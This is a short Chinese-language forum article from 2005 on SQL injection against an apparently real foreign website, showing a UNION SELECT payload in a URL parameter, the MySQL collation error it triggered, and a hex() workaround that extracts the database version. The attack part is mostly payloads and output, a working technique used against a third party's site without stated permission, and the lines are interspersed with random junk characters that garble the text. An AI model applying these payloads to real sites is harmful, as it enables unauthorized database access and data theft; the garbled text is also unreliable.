本文作者:SuperHei+ h; E% _, R0 L, s8 C
文章性质:原创& e% ^' _) B! a9 A' ^) e5 P8 c0 j
发布日期:2005-10-18 B6 q7 R! y( D2 D1 {' ^, ]" }
测试个国外的站时:
/ [- i8 q" l3 O- t( ]# \+ O- l: vurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
% N& C( z% { t6 z4 Y返回错误:/ X* @7 ~- V P; _- `" ^# B/ x
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
# ]+ m7 E4 g. S, {6 xMySQL Error No. 1266 z/ i, N; R: J7 m2 ~" n& S" h7 k) J
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。( V6 ]+ y/ t4 d
解决办法:转为其他编码如hex。
/ p/ c& X# S& C( w( {5 rurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/** |5 t) i! N1 l3 E# g4 a' z; [$ q7 k
成功得到hex(version())的值为:
6 h+ X f$ g" l: \1 p; X342E312E332D62657461# S" M [2 o3 U/ Q( _/ t/ S: u
回Mysql查询下得到:* D- p3 [" ?5 O5 m5 [
mysql> select 0x342E312E332D62657461;
+ ?' b1 m# D5 L+ L q( s+------------------------+
) V0 C# a* u2 `| 0x342E312E332D62657461 |
2 _9 B N4 Z+ A! m# ^; x( i+------------------------+
# _/ K+ L5 J+ P i3 L| 4.1.3-beta |
9 N, G/ P' _6 B' x8 I q3 T+------------------------+- @: v2 W. R% l5 l, j, p) L, f" ^
1 row in set (0.00 sec)/ t2 b; M# G9 v
/ S6 ]/ Y' l8 L" ^ |